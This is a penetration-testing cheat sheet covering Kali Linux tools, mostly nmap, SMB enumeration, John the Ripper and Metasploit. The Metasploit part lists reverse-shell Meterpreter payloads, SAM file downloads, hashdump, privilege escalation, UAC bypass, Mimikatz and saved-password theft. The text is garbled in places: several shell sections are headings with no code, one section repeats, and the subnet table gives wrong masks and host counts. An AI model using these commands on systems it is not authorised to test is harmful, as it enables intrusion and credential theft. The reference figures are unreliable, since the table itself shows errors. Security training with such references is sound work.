Kali Linux Cheat Sheet for Penetration Testers by rock star devil
Penetration testing (also called pen testing) is the practice of
testing a computer system, network or Web application to find
vulnerabilities that an attacker could exploit.
Kali Linux Cheat Sheet for Penetration testers is a high level
overview for typical penetration testing environment ranging from nmap,
sqlmap, ipv4, enumeration, fingerprinting etc. Always view man pages if
you are in doubt or the commands are not working as outlined here (can
be OS based, version based changes etc.) for the operating system you
are using (such as BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu
etc.). I’ve also referenced some guides that I found useful in different
sections and it might come in handy.
Recon and Enumeration
NMAP Commands
Nmap (“Network Mapper”) is a free and open source utility for network
discovery and security auditing. Many systems and network
administrators also find it useful for tasks such as network inventory,
managing service upgrade schedules, and monitoring host or service
uptime. Nmap uses raw IP packets in novel ways to determine what hosts
are available on the network, what services (application name and
version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in
use, and dozens of other characteristics. It was designed to rapidly
scan large networks, but works fine against single hosts. Nmap runs on
all major computer operating systems, and official binary packages are
available for Linux, Windows, and Mac OS X.
Command
Description
nmap -v -sS -A -T4 target
Nmap verbose scan, runs syn stealth, T4 timing (should be ok on
LAN), OS and service version info, traceroute and scripts against
services
nmap -v -sS -p–A -T4 target
As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target
As above but scans all TCP ports and UDP scan (takes even longer)
In computer networking, Server Message Block (SMB), one version of
which was also known as Common Internet File System (CIFS, /ˈsɪfs/),
operates as an application-layer network protocol mainly used for
providing shared access to files, printers, and serial ports and
miscellaneous communications between nodes on a network
Command
Description
nbtscan 192.168.1.0/24
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Other Host Discovery
Other methods of host discovery, that don’t use nmap…
Command
Description
netdiscover -r 192.168.1.0/24
Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site
SMB Enumeration
Enumerate Windows shares / Samba shares.
Command
Description
nbtscan 192.168.1.0/24
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Python Local Web Server
Python local web server command, handy for serving up shells and exploits on an attacking machine.
Command
Description
python -m SimpleHTTPServer 80
Run a basic http server, great for serving up shells etc
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
Command
Description
mount 192.168.1.1:/vol/share /mnt/nfs
Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove
password it will prompt on the CLI (more secure as it wont end up in
bash_history)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k -y
Install smb4k on Kali, useful Linux GUI for browsing SMB shares
Basic FingerPrinting
A device fingerprint or machine fingerprint or browser fingerprint is
information collected about a remote computing device for the purpose
of identification. Fingerprints can be used to fully or partially
identify individual users or devices even when cookies are turned off.
Command
Description
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
Basic versioning / fingerprinting via displayed banner
SNMP Enumeration
SNMP enumeration is the process of using SNMP to enumerate user
accounts on a target system. SNMP employs two major types of software
components for communication: the SNMP agent, which is located on the
networking device, and the SNMP management station, which communicates
with the agent.
Hydra is a parallelized login cracker which supports numerous
protocols to attack. It is very fast and flexible, and new modules are
easy to add. This tool makes it possible for researchers and security
consultants to show how easy it would be to gain unauthorized access to a
system remotely. On Ubuntu it can be installed from the synaptic
package manager. On Kali Linux, it is per-installed.
Use -t to limit concurrent connections, example: -t 15
Cracking password using Hydra guide here
Password Cracking
John The Ripper – JTR
John the Ripper is different from tools like Hydra. Hydra does blind
brute-forcing by trying username/password combinations on a service
daemon like ftp server or telnet server. John however needs the hash
first. So the greater challenge for a hacker is to first get the hash
that is to be cracked. Now a days hashes are more easily crackable using
free rainbow tables available online. Just go to one of the sites,
submit the hash and if the hash is made of a common word, then the site
would show the word almost instantly. Rainbow tables basically store
common words and their hashes in a large database. Larger the database,
more the words covered.
Command
Description
john –wordlist=/usr/share/wordlists/rockyou.txt hashes
JTR password cracking
john –format=descrypt –wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt cracking with wordlist
john –format=descrypt hash –show
JTR forced descrypt brute force cracking
Cracking password using John the Ripper guide here
Exploit Research
Ways to find exploits for enumerated hosts / services.
Command
Description
searchsploit windows 2003 | grep -i local
Search exploit-db for exploit, in this example windows 2003 + local esc
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
SUID C Shell for /bin/bash
SUID C Shell for /bin/sh
Building the SUID Shell binary
For 32 bit:
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.
Python TTY Shell Trick
Spawn Interactive sh shell
Spawn Perl TTY Shell
Spawn Ruby TTY Shell
Spawn Lua TTY Shell
Spawn TTY Shell from Vi
Run shell commands from vi:
Spawn TTY Shell NMAP
Metasploit
Metasploit was created by H. D. Moore in 2003 as a portable network
tool using Perl. By 2007, the Metasploit Framework had been completely
rewritten in Ruby. On October 21, 2009, the Metasploit Project announced
that it had been acquired by Rapid7, a security company that provides
unified vulnerability management solutions.
Like comparable commercial products such as Immunity’s Canvas or Core
Security Technologies’ Core Impact, Metasploit can be used to test the
vulnerability of computer systems or to break into remote systems. Like
many information security tools, Metasploit can be used for both
legitimate and unauthorized activities. Since the acquisition of the
Metasploit Framework, Rapid7 has added two open core proprietary
editions called Metasploit Express and Metasploit Pro.
Metasploit’s emerging position as the de facto exploit development
framework led to the release of software vulnerability advisories often
accompanied by a third party Metasploit exploit module that highlights
the exploitability, risk and remediation of that particular bug.
Metasploit 3.0 began to include fuzzing tools, used to discover software
vulnerabilities, rather than just exploits for known bugs. This avenue
can be seen with the integration of the lorcon wireless (802.11) toolset
into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in
August 2011.
Meterpreter Payloads
Windows reverse meterpreter payload
Command
Description
set payload windows/meterpreter/reverse_tcp
Windows reverse tcp payload
Windows VNC Meterpreter payload
Command
Description
set payload windows/vncinject/reverse_tcp
set ViewOnly false
Meterpreter Windows VNC Payload
Linux Reverse Meterpreter payload
Command
Description
set payload linux/meterpreter/reverse_tcp
Meterpreter Linux Reverse Payload
Meterpreter Cheat Sheet
Useful meterpreter commands.
Command
Description
upload file c:\\windows
Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp
Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe
Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c
Creates new channel with cmd shell
ps
Meterpreter show processes
shell
Meterpreter get shell on the target
getsystem
Meterpreter attempts priviledge escalation the target
hashdump
Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target
Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target
Meterpreter delete port forward
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
Command
Description
use exploit/windows/smb/ms08_067_netapi
MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi
MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit
Local Windows Metasploit Modules (exploits)
Command
Description
use exploit/windows/local/bypassuac
Bypass UAC on Windows 7 + Set target + arch, x86/64
Auxilary Metasploit Modules
Command
Description
use auxiliary/scanner/http/dir_scanner
Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan
Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login
Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version
Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login
Metasploit Oracle Login Module
Metasploit Powershell Modules
Command
Description
use exploit/multi/script/web_delivery
Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell
Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer
Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload
Metasploit MSSQL payload
Post Exploit Windows Metasploit Modules
Command
Description
run post/windows/gather/win_privs
Metasploit show privileges of current user
use post/windows/gather/credentials/gpp
Metasploit grab GPP saved passwords
load mimikatz -> wdigest
Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum
Idenitfy other machines that the supplied domain user has administrative access to
Networking
TTL Fingerprinting
Operating System
TTL Size
Windows
128
Linux
64
Solaris
255
Cisco / Network
255
IPv4
Classful IP Ranges
E.g Class A,B,C (depreciated)
Class
IP Address Range
Class A IP Address Range
0.0.0.0 – 127.255.255.255
Class B IP Address Range
128.0.0.0 – 191.255.255.255
Class C IP Address Range
192.0.0.0 – 223.255.255.255
Class D IP Address Range
224.0.0.0 – 239.255.255.255
Class E IP Address Range
240.0.0.0 – 255.255.255.255
IPv4 Private Address Ranges
Class
Range
Class A Private Address Range
10.0.0.0 – 10.255.255.255
Class B Private Address Range
172.16.0.0 – 172.31.255.255
Class C Private Address Range
192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255
IPv4 Subnet Cheat Sheet
CIDR
Decimal Mask
Number of Hosts
/31
255.255.255.254
1 Host
/30
255.255.255.252
2 Hosts
/29
255.255.255.249
6 Hosts
/28
255.255.255.240
14 Hosts
/27
255.255.255.224
30 Hosts
/26
255.255.255.192
62 Hosts
/25
255.255.255.128
126 Hosts
/24
255.255.255.0
254 Hosts
/23
255.255.254.0
512 Host
/22
255.255.252.0
1022 Hosts
/21
255.255.248.0
2046 Hosts
/20
255.255.240.0
4094 Hosts
/19
255.255.224.0
8190 Hosts
/18
255.255.192.0
16382 Hosts
/17
255.255.128.0
32766 Hosts
/16
255.255.0.0
65534 Hosts
/15
255.254.0.0
131070 Hosts
/14
255.252.0.0
262142 Hosts
/13
255.248.0.0
524286 Hosts
/12
255.240.0.0
1048674 Hosts
/11
255.224.0.0
2097150 Hosts
/10
255.192.0.0
4194302 Hosts
/9
255.128.0.0
8388606 Hosts
/8
255.0.0.0
16777214 Hosts
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
ASCII
Character
x00
Null Byte
x08
BS
x09
TAB
x0a
LF
x0d
CR
x1b
ESC
x20
SPC
x21
!
x22
“
x23
#
x24
$
x25
%
x26
&
x27
`
x28
(
x29
)
x2a
*
x2b
+
x2c
,
x2d
–
x2e
.
x2f
/
x30
0
x31
1
x32
2
x33
3
x34
4
x35
5
x36
6
x37
7
x38
8
x39
9
x3a
:
x3b
;
x3c
<
x3d
=
x3e
>
x3f
?
x40
@
x41
A
x42
B
x43
C
x44
D
x45
E
x46
F
x47
G
x48
H
x49
I
x4a
J
x4b
K
x4c
L
x4d
M
x4e
N
x4f
O
x50
P
x51
Q
x52
R
x53
S
x54
T
x55
U
x56
V
x57
W
x58
X
x59
Y
x5a
Z
x5b
[
x5c
\
x5d
]
x5e
^
x5f
_
x60
`
x61
a
x62
b
x63
c
x64
d
x65
e
x66
f
x67
g
x68
h
x69
i
x6a
j
x6b
k
x6c
l
x6d
m
x6e
n
x6f
o
x70
p
x71
q
x72
r
x73
s
x74
t
x75
u
x76
v
x77
w
x78
x
x79
y
x7a
z
CISCO IOS Commands
A collection of useful Cisco IOS commands.
Command
Description
enable
Enters enable mode
conf t
Short for, configure terminal
(config)# interface fa0/0
Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
Add ip to fa0/0
(config-if)# line vty 0 4
Configure vty line
(config-line)# login
Cisco set telnet password
(config-line)# password YOUR-PASSWORD
Set telnet password
# show running-config
Show running config loaded in memory
# show startup-config
Show sartup config
# show version
show cisco IOS version
# show session
display open sessions
# show ip interface
Show network interfaces
# show interface e0
Show detailed interface info
# show ip route
Show routes
# show access-lists
Show access lists
# dir file systems
Show available files
# dir all-filesystems
File information
# dir /all
SHow deleted files
# terminal length 0
No limit on terminal output
# copy running-config tftp
Copys running config to tftp server
# copy running-config startup-config
Copy startup-config to running-config
Cryptography
Hash Lengths
Hash
Size
MD5 Hash Length
16 Bytes
SHA-1 Hash Length
20 Bytes
SHA-256 Hash Length
32 Bytes
SHA-512 Hash Length
64 Bytes
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
Identify HASH and cracking password using Wireshark guide here
SQLMap Examples
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a powerful detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.